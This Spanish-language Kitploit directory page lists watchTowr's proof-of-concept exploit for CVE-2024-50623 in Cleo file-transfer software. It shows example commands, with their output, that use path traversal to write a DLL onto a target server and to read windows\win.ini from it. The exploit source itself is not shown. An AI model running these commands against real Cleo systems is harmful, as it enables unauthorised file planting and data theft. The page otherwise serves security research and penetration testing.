Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-50623 — Cleo PoC de carga y descarga de archivos sin restricciones (CVE-2024-50623) | Kitploit
Herramientas/GitHubGitHub/watchtowrlabs/cve-2024-50623
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónRed Teaming
GitHubwatchtowrlabs/cve-2024-50623

CVE-2024-50623

Cleo PoC de carga y descarga de archivos sin restricciones (CVE-2024-50623)

Ver Repositorio
2571hace 1 añoRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2024-50623

Cleo: PoC de carga y descarga de archivos sin restricciones (CVE-2024-50623)

Escritura arbitraria de archivos

root@kitploit:~
python CVE-2024-50623.py --target http://192.168.1.18:5080/Synchronization --action write --what poc.dll --where "..\..\..\..\poc.dll"
                         __         ___  ___________
         __  _  ______ _/  |__ ____ |  |_\__    ____\____  _  ________
         \ \/ \/ \__  \    ___/ ___\|  |  \|    | /  _ \ \/ \/ \_  __ \
          \     / / __ \|  | \  \___|   Y  |    |(  <_> \     / |  | \/
           \/\_/ (____  |__|  \___  |___|__|__  | \__  / \/\_/  |__|
                                  \/          \/     \/

        CVE-2024-50623.py
        (*) Cleo Unrestricted file upload and download vulnerability (CVE-2024-50623)

          - Sonny and Sina Kheirkhah (@SinSinology) of watchTowr ([email protected])

        CVEs: [CVE-2024-50623]
[INFO] File written successfully

Lectura arbitraria de archivos

root@kitploit:~
python CVE-2024-50623.py --target http://192.168.1.18:5080/Synchronization --action read --what CVE-2024-50623.py --where "..\..\windows\win.ini" __ ___ ___________ __ _ ______ _/ |__ ____ | |_\__ ____\____ _ ________ \ \/ \/ \__ \ ___/ ___\| | \| | / _ \ \/ \/ \_ __ \ \ / / __ \| | \ \___| Y | |( <_> \ / | | \/ \/\_/ (____ |__| \___ |___|__|__ | \__ / \/\_/ |__| \/ \/ \/ CVE-2024-50623.py (*) Cleo Unrestricted file upload and download vulnerability (CVE-2024-50623) - Sonny and Sina Kheirkhah (@SinSinology) of watchTowr ([email protected]) CVEs: [CVE-2024-50623] ; for 16-bit app support [fonts] [extensions] [mci extensions] [files] [Mail] MAPI=1

Autores del exploit

Este exploit fue escrito por Sonny y Sina Kheirkhah (@SinSinology) de watchTowr (@watchtowrcyber)

Sigue a watchTowr Labs

Para las últimas investigaciones de seguridad, sigue al equipo de watchTowr Labs

  • https://labs.watchtowr.com/
  • https://x.com/watchtowrcyber
Descargar herramienta